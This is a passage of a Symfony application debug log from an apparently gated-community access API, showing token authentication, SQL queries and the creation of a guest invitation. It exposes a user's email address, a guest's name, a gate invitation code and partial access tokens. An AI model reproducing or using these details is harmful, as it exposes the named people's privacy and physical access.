<Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>b600a070-65bd-5fc4-9d94-c1b12402b2c1</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-21 00:29:51] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:30:33] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-21 00:30:33] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:30:33] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:30:33] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:30:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:30:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:30:33] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
[2025-12-21 00:30:33] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-21 00:30:33] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"c4e0f8a7-1dba-4478-9799-96 [...]","2":1,"3":"2025-12-21 00:30:33","4":"2025-12-21 00:30:33","5":"Mariana","6":"Borges","7":"060401","8":"/invitation/e249d01de70d35 [...]","9":"2","10":"1","11":"2025-12-21 16:00:00","12":null,"13":null,"14":null,"15":274,"16":398} []
[2025-12-21 00:30:33] doctrine.DEBUG: "COMMIT" [] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
[2025-12-21 00:30:33] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:30:33] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
[2025-12-21 00:30:33] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:30:33] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:30:33] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:30:33] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:30:33] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:30:33] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-21 00:30:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:30:33] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:30:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c07d72","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/c07d72?panel=security","method":"GET"} []
[2025-12-21 00:30:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 00:31:18] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:18] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:18] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:18] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:18] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:18] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:18] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:18] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:18] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:18] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:18] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:18] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-21 00:31:18] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 00:31:21] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-21 00:31:21] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:21] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 00:31:21] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 00:31:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 00:31:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:21] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:21] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b3733e61425934f11fb43f9cbc [...]"] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-21 00:31:21] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:21] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:21] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-21 00:31:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
